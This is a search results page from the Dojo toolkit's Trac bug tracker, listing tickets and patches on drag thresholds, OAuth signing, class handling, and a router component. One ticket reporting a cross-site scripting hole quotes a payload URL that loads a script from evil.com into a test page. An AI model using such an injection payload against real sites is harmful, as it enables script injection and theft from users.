Results (1 - 10 of 23)
- #17043: defect: dojox.rpc.Service incorrect naming conflic detection when generating ... (closed: fixed)
- line 65: if(this[method]){ it should be: if(this[serviceName]){ "method" here is actually the smd object.
- By Apr 18, 2013, 1:08:40 PM —
- #15247: feature: Router component (closed: fixed)
- Ticket for new router component.
- By Apr 24, 2012, 11:16:34 PM —
- #14618: task: Update dojox/widget/UpgradeBar to work with dojo/sniff (closed: fixed)
- The new {{{dojo/sniff}}} module landed recently, so it's time to update the !UpgradeBar (specifically the tests) to use it rather than {{{dojo.isIE}}}, etc.
- By Jan 13, 2012, 6:22:35 PM —
- #13674: defect: borderContainer.php should not allow script attacks (closed: fixed)
- We need to plug this security hole: {{{ http://projecttests.customer.com/dojo1.7/dijit/tests/layout/borderContainer.php?id=<script src=http://evil.com/xss/hack.js></script> }}}
- By Aug 11, 2011, 9:17:01 PM —
- addClassUndefined.patch (Ticket #11146)
- Allow undefined classStr parameter to addClass and toggleClass, plus a test for such usage
- By May 14, 2010, 6:42:34 PM —
- #11146: defect: [REGRESSION] addClass and toggleClass can't handle an undefined ... (closed: fixed)
- r19075 seems to have broken the handling for {{{dojo.addClass(node, some_undefined_variable)}}} and {{{toggleClass(node)}}}. In 1.3, these run without error, but in 1.4, it throws an error. Calling these functions this way is an obvious pr ...
- By May 14, 2010, 6:41:51 PM —
- #8417: defect: OAuth signing breaks unless query string content is manually added to ... (closed: wontfix)
- `dojox.io.OAuth.sign` seems to erroneously require query string vars to be included in the `url` property of the kwArgs. I would expect to be able to do, e.g.: {{{ dojo.xhrGet(dojox.io.OAuth.sign("GET", { url: "http://domain.com/some ...
- By Jan 14, 2009, 5:38:06 PM —
- tree-dnd-drag-threshold.patch (Ticket #7437)
- Allow dijit.Tree DnD to specify a drag threshold; Revin Guillen, CLA on file
- By Aug 14, 2008, 5:57:41 PM —
- #7437: enhancement: [patch][cla] Allow dijit.Tree to specify a drag threshold (closed: fixed)
- #7436 has a patch to allow you to specify a drag threshold for dojo.dnd.Source as a guard against accidental drags. Attached is a patch to add the same behavior to the dijit.Tree DnD implementation.
- By Aug 14, 2008, 5:57:08 PM —
- dnd-source-delay.patch (Ticket #7436)
- Allow dojo.dnd.Source to specify a drag threshold; Revin Guillen, CLA on file
- By Aug 14, 2008, 5:29:23 PM —
Note: See TracSearch
for help on searching.